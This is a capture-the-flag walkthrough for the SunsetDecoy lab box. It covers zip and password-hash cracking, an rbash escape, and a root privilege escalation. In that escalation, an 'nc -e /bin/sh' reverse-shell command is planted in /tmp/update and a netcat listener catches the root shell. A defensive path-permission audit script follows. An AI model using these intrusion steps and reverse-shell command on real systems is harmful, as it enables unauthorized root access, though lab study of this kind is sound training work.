Log in here with a Kali Linux box: https://portal.offensive-security.com/proving-grounds/play
Get a free VPN set of credentials and connect. Click to start the target box called SunsetDecoy and do these steps:
- Scan to find tcp/22 and 80 open. Browse to 80 to find save.zip
- The file is password protected; crack it with something like fcrackzip or zip2john to find the password.
- Unzip to find key files from /etc/shadow, passwd, sudoers, hosts and others. Note the absurd username 296640a3b825115a47b68fc44501c828.
- Use 'unshadow' to combine passwd with shadow and run the result through John the Ripper to reveal the password for the absurd username above. Then connect with ssh: $ssh 296640a3b825115a47b68fc44501c828@192.168.229.85 -t "bash --noprofile" and the password you found. (I'm not telling it to you b/c I want you to learn through the process.)
- Once connected, you'll be in rbash (restricted bash). The -t "bash --noprofile" helps, but you'll still have to call binaries by absolute path, e.g. /usr/bin/cat.
- In the home directory of the user account ending in 828 above, you’ll see some files of interest, notably the first flag is there.
- The AV that you execute below looks for a file at /tmp/update, and that process runs as root, so …
- echo "/usr/bin/nc -e /bin/sh 192.168.X.X 4444" >/tmp/update and it will run as root when the AV process executes.
- On your local box, run #nc -lvp 4444 to intercept the incoming root shell from the target.
- Another key file is called honeypot.decoy and is executable (chmod +x). Run it and choose the AV option to execute the /tmp/update file, which opens the reverse shell back to you.
- Check your netcat listener and you’ll see the shell open. You won’t get a local echo or prompt, just a new line with root privs.
- cd /root and cat proof.txt for the string to get credit.
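The weakness this box turns on is a root process executing a file at a path any user can create. As an added defender's check (not code from the original walkthrough), the audit below walks a path and its parent directories and flags untrusted ownership, world-writable files, and world-writable directories without the sticky bit; the filesystem snapshot is constructed, and the /srv entries are hypothetical contrast cases.

```python
import os
import stat

# Constructed snapshot of (uid, st_mode) per path, standing in for os.lstat() on the target.
# /tmp/update is the drop file from the walkthrough; the /srv entries are hypothetical contrast cases.
SAMPLE_FS = {
    "/": (0, 0o40755),
    "/tmp": (0, 0o41777),             # root-owned, world-writable, sticky bit set
    "/tmp/update": (1000, 0o100644),  # created by an unprivileged user
    "/srv": (0, 0o40755),
    "/srv/update.sh": (0, 0o100755),  # root-owned script in a root-owned directory: clean
    "/srv/scripts": (0, 0o40777),     # world-writable and NOT sticky: anyone can swap entries
    "/srv/scripts/run.sh": (0, 0o100755),
}

def ancestors(path):
    """Yield the normalised path, then each parent directory up to '/'."""
    p = os.path.normpath(path)
    while True:
        yield p
        parent = os.path.dirname(p)
        if parent == p:
            return
        p = parent

def audit_exec_path(path, fs, trusted_uids=(0,)):
    """Reasons an untrusted user could control what root runs at `path`; fs: path -> (uid, st_mode)."""
    reasons = []
    for comp in ancestors(path):
        entry = fs.get(comp)
        if entry is None:
            reasons.append(f"{comp}: missing, so whoever can write its parent can create it")
            continue
        uid, mode = entry
        if uid not in trusted_uids:
            reasons.append(f"{comp}: owned by uid {uid}, not a trusted uid")
        if stat.S_ISDIR(mode):
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:  # writable dir, no sticky bit
                reasons.append(f"{comp}: world-writable directory without sticky bit")
        elif mode & stat.S_IWOTH:
            reasons.append(f"{comp}: world-writable file")
    return reasons

def snapshot(path):
    """Build an `fs` dict for `path` and its existing ancestors from the live filesystem."""
    out = {}
    for comp in filter(os.path.lexists, ancestors(path)):
        st = os.lstat(comp)
        out[comp] = (st.st_uid, st.st_mode)
    return out
```

On a live host, audit_exec_path("/tmp/update", snapshot("/tmp/update")) reports the same findings from real ownership and mode bits.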
PS: You'll see some decoys, like in the honeypot.decoy binary when you run it and select 'leave a message'. The filename generated is cmFuZG9tc2Zvc2FuZm9kYW52cw== . If you're not familiar, this is a base64 encoded string.
To decode, enter $echo cmFuZG9tc2Zvc2FuZm9kYW52cw== | base64 -d
randomsfosanfodanvs
This isn't useful for anything I found, but it's part of the process of uncovering information toward your objective.